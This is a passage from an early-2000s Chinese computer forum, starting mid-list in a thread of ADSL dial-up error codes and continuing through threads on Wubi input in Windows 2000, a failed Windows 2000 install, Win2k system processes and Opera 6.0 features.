解决：卸载干净任何PPPoE软件，重新安装

Error 605 Cannot set port information
问题：拨号网络网络由于设备安装错误不能设定使用端口
原因：RasPPPoE没有完全和正确的安装
解决：卸载干净任何PPPoE软件，重新安装

Error 606 The port is not connected
问题：拨号网络网络不能连接所需的设备端口
原因：RasPPPoE没有完全和正确的安装，连接线故障，ADSL MODEM故障
解决：卸载干净任何PPPoE软件，重新安装，检查网线和 ADSL MODEM

Error 608 The device does not exist
问题：拨号网络网络连接的设备不存在
原因：RasPPPoE没有完全和正确的安装
解决：卸载干净任何PPPoE软件，重新安装

Error 609 The device type does not exist
问题：拨号网络网络连接的设备其种类不能确定
原因：RasPPPoE没有完全和正确的安装
解决：卸载干净任何PPPoE软件，重新安装

Error 611 The route is not available/612 The route is not allocated
问题：拨号网络网络连接路由不正确
原因：RasPPPoE没有完全和正确的安装，ISP服务器故障
解决：卸载干净任何PPPoE软件，重新安装，致电ISP询问

Error 617 The port or device is already disconnecting
问题：拨号网络网络连接的设备已经断开
原因：RasPPPoE没有完全和正确的安装，ISP服务器故障，连接线，ADSL MODEM故障 解决：卸载干净任何PPPoE软件，重新安装，致电ISP询问 ，检查网线和 ADSL MODEM

Error 619 问题：与ISP服务器不能建立连接
原因：ADSL ISP 服务器故障，ADSL电话线故障
解决：检查ADSL信号灯是否能正确同步。致电ISP询问

Error 621 Cannot open the phone book file
Error 622 Cannot load the phone book file
Error 623 Cannot find the phone book entry
Error 624 Cannot write the phone book file
Error 625 Invalid information found in the phone book
问题：Windows NT 或者 Windows 2000 Server 网络RAS网络组件故障
原因：卸载所有PPPoE软件，重新安装RAS网络组件和RasPPPoE Error 630
问题：ADSL MODEM没有没有响应
原因：ADSL电话线故障，ADSL MODEM故障（电源没打开等）
解决：检查ADSL设备

Error 633
问题：拨号网络网络由于设备安装错误或正在使用，不能进行连接
原因：RasPPPoE没有完全和正确的安装
解决：卸载干净任何PPPoE软件，重新安装

Error 638
问题：过了很长时间，无法连接到ISP的ADSL接入服务器
原因：ISP服务器故障；在RasPPPoE所创建的不好连接中你错误的输入了一个电话号码
解决：运行其创建拨号的Raspppoe.exe检查是否能列出ISP服务，以确定ISP正常;把所使用的拨号连接中的 电话号码清除或者只保留一个0。

Error 645
问题：网卡没有正确响应
原因：网卡故障，或者网卡驱动程序故障
解决：检查网卡，重新安装网卡驱动程序

Error 650
问题：远程计算机没有响应，断开连接
原因：ADSL ISP 服务器故障，网卡故障，非正常关机造成网络协议出错
解决：检查ADSL信号灯是否能正确同步，致电ISP询问；检查网卡，删除所有网络组件重新安装网络。

Error 651
问题：ADSL MODEM报告发生错误
原因：Windows处于安全模式下，或其他错误
解决：出现该错误时，进行重拨，就可以报告出新的具体错误代码

Error 691
问题：输入的用户名和密码不对，无法建立连接
原因：用户名和密码错误，ISP服务器故障
解决：使用正确的用户名和密码，并且使用正确的ISP账号格式(name@service),致电ISP询问。

Error 718
问题：验证用户名时远程计算机超时没有响应，断开连接
原因：ADSL ISP 服务器故障
解决：致电ISP询问

Error 720
问题：拨号网络无法协调网络中服务器的协议设置
原因：ADSL ISP 服务器故障，非正常关机造成网络协议出错
解决：致电ISP询问，删除所有网络组件重新安装网络。

Error 734
问题：PPP连接控制协议中止
原因：ADSL ISP 服务器故障，非正常关机造成网络协议出错
解决：致电ISP询问，删除所有网络组件重新安装网络。

Error 738
问题：服务器不能分配IP地址
原因：ADSL ISP 服务器故障，ADSL用户太多超过ISP所能提供的IP地址
解决：致电ISP询问

Error 797
问题：ADSL MODEM连接设备没有找到
原因：ADSL MODEM电源没有打开，网卡和ADSL MODEM的连接线出现问题，软件安装以后相应的协议没有正确 邦定，在创立拨号连接时，建立了错误的空连接 解决：检查电源，连接线；检查网络属性，RasPPPoE相关的协议是否正确的安装并正确邦定（相关协议）， 检查网卡是否出现?号或!号，把它设置为Enable;检查拨号连接的属性，是否连接的设备使用了一个 “ISDN channel - Adapter Name (xx)” 的设备，该设备为一个空设备，如果使用了取消它，并 选择正确的PPPoE设备代替它，或者重新创立拨号连接。

这些都是ADSL上网常发生的问题！

^^
上一贴 | 下一贴
快速回复 | 主题：ADSL上网常见问题集锦
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


在WIN2000中五笔字形输入法如何加入

计算机技术
在WIN2000中五笔字形输入法如何加入

上一贴 | 下一贴
发表人 主题: 在WIN2000中五笔字形输入法如何加入
JILL

终级用户
积分：575
发帖：175
来自：沈阳市
注册：2001-12-10
 发表于 2001-12-12 13:54:22 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 收藏该主题供以后查看 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP
请问各位高手，在WIN2000中五笔字形输入法如何加入，安了OFFICE2000也无法加五笔输入法，我应怎样加？谢谢！

誓与WIN2000共存
yixinguy78

终级用户
积分：526
发帖：188
来自：china
注册：2001-02-10
 发表于 2001-12-12 14:19:42 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP
我的XP 也无法安装五笔，同病相怜！！！！谁能救我！！！！！！！！！！！！！！！！

？？？？？？？？？？？？？！！！！！！！！！！！！！！
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-12-12 16:26:32 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
试试智能五笔

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-12 23:48:35 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
http://sd.onlinedown.net/ty_input.htm

有几个支持2k的~

WINDFLASH
::浅紫色FORUM::
northice

终级用户
积分：503
发帖：454
来自：来的地方
注册：2001-02-22
 发表于 2001-12-13 12:24:03 按此观看northice的个人资料 按此发邮件给northice northice 的 oicq 是3418177,查看 3418177 的资料 发送悄悄话给northice 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看northice的IP
我在用五笔,2K版的

需要的话发悄悄话给我.

YOU MUST GO,OR YOU WILL BE SAD!
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-12-13 15:26:43 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
你们不知道Office2000 or office xp里都有五笔吗？王码86和98版

等我想想再签
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-12-13 16:49:53 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
我有WIN2K五笔~

留下E-MAIL,偶发给你!

^^
limitstudio

初级用户
积分：0
发帖：5
来自：沈阳@辽宁
注册：2001-12-14
 发表于 2001-12-14 04:43:59 按此观看limitstudio的个人资料 按此发邮件给limitstudio 访问limitstudio的主页 limitstudio 的 oicq 是8025817,查看 8025817 的资料 发送悄悄话给limitstudio 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看limitstudio的IP
不是吧！我用的也是2000呀！装的就是OFFICE的五笔！

没有我你怎么办？
你的泪水谁为你擦干？
谁帮你打伞？
安慰你心烦？
失眠的夜你最怕孤单！
limitstudio

初级用户
积分：0
发帖：5
来自：沈阳@辽宁
注册：2001-12-14
 发表于 2001-12-14 04:46:40 按此观看limitstudio的个人资料 按此发邮件给limitstudio 访问limitstudio的主页 limitstudio 的 oicq 是8025817,查看 8025817 的资料 发送悄悄话给limitstudio 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看limitstudio的IP
?

没有我你怎么办？
你的泪水谁为你擦干？
谁帮你打伞？
安慰你心烦？
失眠的夜你最怕孤单！
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-12-14 09:28:52 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
BIGBUG在上个帖子中说
引用:
你们不知道Office2000 or office xp里都有五笔吗？王码86和98版

86版和98版太简单，尤其是词组太少。 而智能五笔的词组多得你不敢想象。

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

上一贴 | 下一贴
快速回复 | 主题：在WIN2000中五笔字形输入法如何加入
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


装不了win2000 ！请高手高抬贵鼠！！

计算机技术
装不了win2000 ！请高手高抬贵鼠！！

上一贴 | 下一贴
发表人 | 主题: 装不了win2000 ！请高手高抬贵鼠！！
有时好心的坏蛋 终级用户 积分：715 发帖：243 来自：广东 注册：2001-11-20 | 发表于 2001-11-26 22:54:26 按此观看有时好心的坏蛋的个人资料 按此发邮件给有时好心的坏蛋 访问有时好心的坏蛋的主页 有时好心的坏蛋 的 oicq 是7658826,查看 7658826 的资料 收藏该主题供以后查看 发送悄悄话给有时好心的坏蛋 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看有时好心的坏蛋的IP 今天装win2000时，碰到了以下的问题： 在装的过程中都没什么问题 . 在即将进入其界面时，连自检都通过了， 但就突然黑屏了，键盘灯也不亮。按任何键没反应。 只能重新起动以前我装win2000时，也是这个情况， 当时只是认为内存不够。 现在加了128m还是不行。但我可以装winxp。 应该不会是硬件的问题。 但我还可以在其安全模式的VGA底下可以进其界面.还可以装一些程序！ 于是我认为是显卡问题，在安全模式下不用加载驱程。 我怀疑是主板问题.我的主板是精英双子星(p6bat-a+)的，声卡自带。 显卡是NVIDIA RIVA TNT2 model 64. 我又装了几次，累试不爽！累了。 这个情况，十分不明。请大虾，老菜，帮下忙。 拜托，拜托！ 这家伙很懒，什么也没有留下 http://idiot.sharella.com
碧玉刀 初级用户 积分：7 发帖：15 来自：湖北 注册：2001-05-15 | 发表于 2001-11-27 02:05:21 按此观看碧玉刀的个人资料 按此发邮件给碧玉刀 访问碧玉刀的主页 碧玉刀 的 oicq 是16598739,查看 16598739 的资料 发送悄悄话给碧玉刀 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看碧玉刀的IP 换张盘试试
阿奇 超级用户 积分：398 发帖：316 来自：火星 注册：2000-08-30 | 发表于 2001-11-30 01:58:03 按此观看阿奇的个人资料 按此发邮件给阿奇 访问阿奇的主页 阿奇 的 oicq 是498391,查看 498391 的资料 发送悄悄话给阿奇 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿奇的IP 应该是你的主板的问题。据我所知，精英这款主板如果使用TNT2显卡装WIN200的话，需要刷新主板BIOS. 具体操作请看这里。 http://www.speedy.com.cn/ 呵呵，另外，如果不刷新的话，估计内存也上不了512M。 -------------------------------- SIW { http://aqi.126.com } { http://designhouse.cc.net.cn } ----------------------------------
有时好心的坏蛋 终级用户 积分：715 发帖：243 来自：广东 注册：2001-11-20 | 发表于 2001-11-30 18:17:24 按此观看有时好心的坏蛋的个人资料 按此发邮件给有时好心的坏蛋 访问有时好心的坏蛋的主页 有时好心的坏蛋 的 oicq 是7658826,查看 7658826 的资料 发送悄悄话给有时好心的坏蛋 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看有时好心的坏蛋的IP 多谢阿奇。我真的试到不想再试了，等我有空的时候我就去刷新bios。 但还想问一个问题：我换什么显卡，就可以进win200了呢？ 是不是随便一块都可以？(我就怀疑是主板问题，不过都没得试) 你的网站好好，有机会向你学习。 这家伙很懒，什么也没有留下 http://idiot.sharella.com
icefly 初级用户 积分：85 发帖：37 来自： 注册：2001-08-14 | 发表于 2001-11-30 20:53:36 按此观看icefly的个人资料 按此发邮件给icefly icefly 的 oicq 是16640259,查看 16640259 的资料 发送悄悄话给icefly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看icefly的IP 应该是主板的问题，以前我也是出现这种情况，换一块就没什么问题了 ：：远看一只花 ：：近看还是花 ：：再近一点还是花 ：：×￥◎！￥％……％有完没完？我当然是花
有时好心的坏蛋 终级用户 积分：715 发帖：243 来自：广东 注册：2001-11-20 | 发表于 2001-11-30 22:43:14 按此观看有时好心的坏蛋的个人资料 按此发邮件给有时好心的坏蛋 访问有时好心的坏蛋的主页 有时好心的坏蛋 的 oicq 是7658826,查看 7658826 的资料 发送悄悄话给有时好心的坏蛋 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看有时好心的坏蛋的IP 我只是学生一个那来这么多钱换板呀， 何况这是治根不治本。：P But still thank you as the same. 这家伙很懒，什么也没有留下 http://idiot.sharella.com
阿奇 超级用户 积分：398 发帖：316 来自：火星 注册：2000-08-30 | 发表于 2001-12-01 03:43:11 按此观看阿奇的个人资料 按此发邮件给阿奇 访问阿奇的主页 阿奇 的 oicq 是498391,查看 498391 的资料 发送悄悄话给阿奇 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿奇的IP 呵呵，主要是我以前也用过这款主板，深受其害，内存上不了512，只得换。：（ -------------------------------- SIW { http://aqi.126.com } { http://designhouse.cc.net.cn } ----------------------------------
非常可乐 初级用户 积分：24 发帖：9 来自：兰州，甘肃，中国 注册：2000-11-21 | 发表于 2001-12-07 22:19:02 按此观看非常可乐的个人资料 按此发邮件给非常可乐 非常可乐 的 oicq 是4264928,查看 4264928 的资料 发送悄悄话给非常可乐 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看非常可乐的IP 你可以换鼠标试试～～
hellslayer 初级用户 积分：20 发帖：251 来自：不能上网的学校 注册：2001-04-04 | 发表于 2001-12-07 22:50:57 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP 你在安装的时候，先做个兼容性检测。看看那里冲突 "我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
lzrone 初级用户 积分：107 发帖：51 来自： 注册：2001-03-18 | 发表于 2001-12-08 01:19:09 按此观看lzrone的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给lzrone 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lzrone的IP 我想，升级bios是个办法 **************************** 星空依旧灿烂
上一贴 | 下一贴
快速回复 | 主题：装不了win2000 ！请高手高抬贵鼠！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


win2k进程详解(转帖)

计算机技术
win2k进程详解(转帖)

上一贴 | 下一贴
发表人 主题: win2k进程详解(转帖)
2smile

活着就好
积分：1622
发帖：1907
来自：SD
注册：2001-05-13
 发表于 2001-11-06 19:10:33 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 收藏该主题供以后查看 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
win2k运行进程详解
=================

Svchost.exe
Svchost.exe文件对那些从动态连接库中运行的服务来说是一个普通的主机进程名。Svhost.exe文件定位
在系统的%systemroot%\system32文件夹下。在启动的时候，Svchost.exe检查注册表中的位置来构建需要
加载的服务列表。这就会使多个Svchost.exe在同一时间运行。每个Svchost.exe的回话期间都包含一组服务，
以至于单独的服务必须依靠Svchost.exe怎样和在那里启动。这样就更加容易控制和查找错误。

Svchost.exe 组是用下面的注册表值来识别。

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost
每个在这个键下的值代表一个独立的Svchost组，并且当你正在看活动的进程时，它显示作为一个单独的
例子。每个键值都是REG_MULTI_SZ类型的值而且包括运行在Svchost组内的服务。每个Svchost组都包含一个
或多个从注册表值中选取的服务名，这个服务的参数值包含了一个ServiceDLL值。
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Service

更多的信息
为了能看到正在运行在Svchost列表中的服务。
开始－运行－敲入cmd
然后在敲入 tlist -s （tlist 应该是win2k工具箱里的冬冬）
Tlist 显示一个活动进程的列表。开关 -s 显示在每个进程中的活动服务列表。如果想知道更多的关于
进程的信息，可以敲 tlist pid。

Tlist 显示Svchost.exe运行的两个例子。
0 System Process
8 System
132 smss.exe
160 csrss.exe Title:
180 winlogon.exe Title: NetDDE Agent
208services.exe
Svcs: AppMgmt, Browser, Dhcp, dmserver, Dnscache, Eventlog, lanmanserver, LanmanWorkstation, LmHosts, Messenger, PlugPlay, ProtectedStorage, seclogon, TrkWks, W32Time, Wmi
220 lsass.exe Svcs: Netlogon,PolicyAgent,SamSs
404 svchost.exe Svcs: RpcSs
452 spoolsv.exe Svcs: Spooler
544 cisvc.exe Svcs: cisvc
556 svchost.exe Svcs: EventSystem,Netman,NtmsSvc,RasMan,SENS,TapiSrv
580 regsvc.exe Svcs: RemoteRegistry
596 mstask.exe Svcs: Schedule
660 snmp.exe Svcs: SNMP
728 winmgmt.exe Svcs: WinMgmt
852 cidaemon.exe Title: OleMainThreadWndName
812 explorer.exe Title: Program Manager
1032 OSA.EXE Title: Reminder
1300 cmd.exe Title: D:\WINNT5\System32\cmd.exe - tlist -s
1080 MAPISP32.EXE Title: WMS Idle
1264 rundll32.exe Title:
1000 mmc.exe Title: Device Manager
1144 tlist.exe
在这个例子中注册表设置了两个组。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost:
netsvcs: Reg_Multi_SZ: EventSystem Ias Iprip Irmon Netman Nwsapagent Rasauto Rasman Remoteaccess SENS Sharedaccess Tapisrv Ntmssvc
rpcss :Reg_Multi_SZ: RpcSs

smss.exe

csrss.exe

这个是用户模式Win32子系统的一部分。csrss代表客户/服务器运行子系统而且是一个基本的子系统
必须一直运行。csrss 负责控制windows，创建或者删除线程和一些16位的虚拟MS-DOS环境。

explorer.exe
这是一个用户的shell（我实在是不知道怎么翻译shell），在我们看起来就像任务条，桌面等等。这个
进程并不是像你想象的那样是作为一个重要的进程运行在windows中，你可以从任务管理器中停掉它，或者重新启动。
通常不会对系统产生什么负面影响。

internat.exe

这个进程是可以从任务管理器中关掉的。
internat.exe在启动的时候开始运行。它加载由用户指定的不同的输入点。输入点是从注册表的这个位置
HKEY_USERS\.DEFAULT\Keyboard Layout\Preload 加载内容的。
internat.exe 加载“EN”图标进入系统的图标区，允许使用者可以很容易的转换不同的输入点。
当进程停掉的时候，图标就会消失，但是输入点仍然可以通过控制面板来改变。

lsass.exe
这个进程是不可以从任务管理器中关掉的。
这是一个本地的安全授权服务，并且它会为使用winlogon服务的授权用户生成一个进程。这个进程是
通过使用授权的包，例如默认的msgina.dll来执行的。如果授权是成功的，lsass就会产生用户的进入
令牌，令牌别使用启动初始的shell。其他的由用户初始化的进程会继承这个令牌的。

mstask.exe
这个进程是不可以从任务管理器中关掉的。
这是一个任务调度服务，负责用户事先决定在某一时间运行的任务的运行。

smss.exe
这个进程是不可以从任务管理器中关掉的。
这是一个会话管理子系统，负责启动用户会话。这个进程是通过系统进程初始化的并且对许多活动的，
包括已经正在运行的Winlogon，Win32（Csrss.exe）线程和设定的系统变量作出反映。在它启动这些
进程后，它等待Winlogon或者Csrss结束。如果这些过程时正常的，系统就关掉了。如果发生了什么
不可预料的事情，smss.exe就会让系统停止响应（就是挂起）。

spoolsv.exe
这个进程是不可以从任务管理器中关掉的。
缓冲（spooler）服务是管理缓冲池中的打印和传真作业。

service.exe
这个进程是不可以从任务管理器中关掉的。
大多数的系统核心模式进程是作为系统进程在运行。

System Idle Process
这个进程是不可以从任务管理器中关掉的。
这个进程是作为单线程运行在每个处理器上，并在系统不处理其他线程的时候分派处理器的时间。

taskmagr.exe
这个进程是可以在任务管理器中关掉的。
这个进程就是任务管理器。

winlogon.exe
这个进程是管理用户登录和推出的。而且winlogon在用户按下CTRL+ALT+DEL时就激活了，显示安全对话框。

winmgmt.exe
winmgmt是win2000客户端管理的核心组件。当客户端应用程序连接或当管理程序需要他本身的服务时这个进程初始化。

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
上一贴 | 下一贴
快速回复 | 主题：win2k进程详解(转帖)
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


Opera 6.0 浏览中文网页不再有困惑（转）

计算机技术
Opera 6.0 浏览中文网页不再有困惑（转）

上一贴 | 下一贴
发表人 主题: Opera 6.0 浏览中文网页不再有困惑（转）
Quester

鼠标说话
是个版主
积分：2604
发帖：1175
来自：GTA
注册：2000-08-28
 发表于 2001-11-21 13:11:02 按此观看Quester的个人资料 按此发邮件给Quester 收藏该主题供以后查看 发送悄悄话给Quester 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Quester的IP
经过长久的等待，Opera 终于推出支援 Unicode 的版本，也就是说，在浏览中文网页时不会出有‘中文断行’的问题了！

Opera 6.0 的新功能：

自订热门名单-谁说书签档只能有文字和图示？Opera 让你在热门名单中放入自订的 HTML 网页，你能放入图片到热门名单中喔～。你可以参考 MyOpera 网页的示范。

SDI/MDI(Single/Multiple Document Interface)切换-虽然 Opera 之前都是 MDI 介面(一个程式中可开启多个网页子视窗)，但是 IE 跟 Netscape 的使用者可能会觉得比较习惯 SDI(一个程式中只能开启一个网页)。Opera 可以让你在程式启动时选择要以 MDI 或是 SDI 启动，提供你更多的选择，但是 Opera 在 SDI 模式下并不会多消耗系统资源。

Hotclick-在 Opera 中你只要在文字上点两下，就会自动跳出右键选单，让你复制文字、搜寻、搜寻百科全书、翻译(可惜没有翻译成中文的选项…)。

个人工具列 Personal Bar-你可以把自己喜欢的网页及搜寻引擎放在这里(类似 IE 的‘连结’工具列)。

快速功能设定-你可以由‘F12’这个快速键快速切换一些常用的选项设定。

键盘快速键 Keyboard shortcuts-原本就很完备的键盘快速键，在新版中增加了更多快速键，让你几乎不用滑鼠就能完成操作。

支援 Unicode-Opera 支援 Unicode，只要你有安装合适的字型，你就可以观看世界各地的网页。

网页视窗切换-你可以按‘Ctrl+Tab’键在 Opera 所开启的网页中切换。

E-mail-你可以汇入 MS Outlook 的帐号。新增支援 TLS(Transport Layer Security)，让你的 POP 和 SMTP 帐号更加安全。

支援业界标准-Opera 支援由 W3C 及其他机构所建立的标准：128 位元加密、TLS 1.0、SSL 2/3、CSS1、CSS2(部分)、XML、HTML 4.01、HTTP 1.1、ECMAScript、JavaScript 1.3、WAP/WML、DOM(部分)。

目前 Opera 6 还在 beta 的阶段，可能会有些不太稳定的地方，不过，如果想体会不一样的网路浏览经验，Opera 绝对值得一试！

下载 ColorKey 试用版 解决配色问题
逢对手鼠标说话，仗一键快意恩仇！
...乍暖還寒時候，最難將息...
Blueidea Web Team
Moderator of Art & Design
ADSL

终级用户
积分：2969
发帖：668
来自：贫困山区
注册：2001-03-06
 发表于 2001-11-21 20:10:24 按此观看ADSL的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ADSL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ADSL的IP
有截图吗?

好好学习，努力做事
itisalex

高级用户
积分：250
发帖：71
来自：shanghai
注册：2001-02-25
 发表于 2002-05-02 17:35:56 按此观看itisalex的个人资料 按此发邮件给itisalex 访问itisalex的主页 itisalex 的 oicq 是65573701,查看 65573701 的资料 发送悄悄话给itisalex 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看itisalex的IP
虽然，文件菜单下面说得很清楚，另存为的快捷键是ctrl+s，但是一般都没有反应，只好割爱，继续用myIE

我臭故我在！
sony

终级用户
积分：965
发帖：264
来自：浙江省
注册：2001-10-05
 发表于 2002-05-02 19:08:26 按此观看sony的个人资料 按此发邮件给sony sony 的 oicq 是27869008,查看 27869008 的资料 发送悄悄话给sony 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sony的IP
已经在用了。感觉鼠标功能实在太棒了
在 Opera 中使用鼠标

基本鼠标用法

可在 Opera 中进行下列基本的鼠标操作:

操作
用法示例

单击 (单击左键)
单击 Web 页中的链接
单击快捷栏中的书签进行选择

用鼠标右键单击 (单击右键)
用鼠标右键单击 Web 页中的链接可弹出菜单
用鼠标右键单击快捷栏中的联系人可弹出菜单
用鼠标右键单击用户界面可更改布局

双击 (快速按两次左键)
查阅 Web 页中的单词
打开快捷栏中的书签

单击，然后移动鼠标
将锁形图像拖曳到个人栏
将锁形图像拖曳到快捷栏中的书签

按住 Ctrl 并单击
在快捷栏中选中多个书签

按住 Shift 并单击
在新窗口中打开链接
在窗口栏上关闭窗口

按住 Shift 并双击
在新窗口中打开书签

按住 Ctrl + Shift 并单击
在后台打开链接

按住 Ctrl + Shift 并双击
在后台打开书签

通常情况下，Shift 意味着“在新窗口中打开”，而 Ctrl + Shift 意味着“在后台打 开”。用鼠标右键单击一个对象通常打开可应用于该对象的多个选项的菜单。

鼠标手势

Opera 迷人的鼠标手势功能将让您可用迅速方便的鼠标移动完成经常使用的浏览操 作。例如，按住键盘上的 Ctrl 并滚动滚轮将可缩放页面。现在就来试试吧！

某些操作可用好几种不同的手势完成。您可以都试试，这样才能决定您到底喜欢哪种。

窗口手势

按下鼠标右键
将鼠标按标明的方向移动
释放鼠标左键

刷新
先向上后向下

还原或最大化窗口
先向上后向右

最小化
先向下后向左

创建新的浏览器窗口
向下

复制窗口
先向下后向上

关闭窗口
先向下后向右
向右向左向右

导航手势

这些手势可能是最常用的了，它们用于在页面历史间跳转。

历史中的上一页
按住右键，然后单击左键
按住右键，向左移动鼠标

历史中的下一页
按住左键，然后单击右键
按住左键，向右移动鼠标

转到父目录
先向上再向左

创建新的空浏览器窗口
双击工作区

转到预设的首页
在空窗口中双击

链接手势

将您的鼠标指向链接
按住鼠标右键
将鼠标按标明的方向移动
释放鼠标右键

在前台的新窗口中打开链接
向下

在后台的新窗口中打开新窗口
先向下后向上

滚轮手势

下列手势需要您的鼠标上有滚轮。

上下滚动
上下滚动滚轮

从一个窗口跳到下一个窗口
按住鼠标右键滚动滚轮

放大和缩小显示比例
按住 Ctrl 键，滚动滚轮

在页面历史中后退和前进
按住 Shift 键，滚动滚轮

平移
按下滚轮，移动鼠标

如果您的鼠标有三个按钮但没有滚轮，那么单击中键与单击滚轮含义相同。

许多夜晚，你轻柔地依偎在我的身上，用纤纤秀手触摸我身上娇嫩的地方，用小巧细嘴吸出我珍贵的体液，直到满足十分才肯松口离开，唉，这该死的蚊子。
上一贴 | 下一贴
快速回复 | 主题：Opera 6.0 浏览中文网页不再有困惑（转）
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


防止电脑死机二十五招（转）

计算机技术
防止电脑死机二十五招（转）

上一贴 | 下一贴
发表人 主题: 防止电脑死机二十五招（转）
51WINDOWS

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2001-12-27 22:39:54 按此观看51WINDOWS的个人资料 按此发邮件给51WINDOWS 访问51WINDOWS的主页 51WINDOWS 的 oicq 是528173,查看 528173 的资料 收藏该主题供以后查看 发送悄悄话给51WINDOWS 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51WINDOWS的IP
